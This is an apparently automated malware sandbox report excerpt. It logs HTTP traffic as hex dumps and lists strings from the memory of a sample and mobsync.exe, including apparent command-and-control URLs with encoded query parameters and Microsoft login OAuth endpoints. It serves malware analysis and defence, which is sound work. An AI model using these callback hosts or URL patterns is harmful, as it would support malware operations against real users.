32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 07 Oct 2024 08:39:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 278Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 64 65 72 61 6c 6c 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.federall.store Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:40:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:40:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:40:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:40:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 08:41:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000007D74000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000006094000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3758373668.00000000091AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3758373668.00000000091AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online/1yii/
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000772C000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005A4C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/vv4m/?7NP=7FXXUPl&amp;EZ2lo=YHtjADYkxu7EjL2CugAOyFkd
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
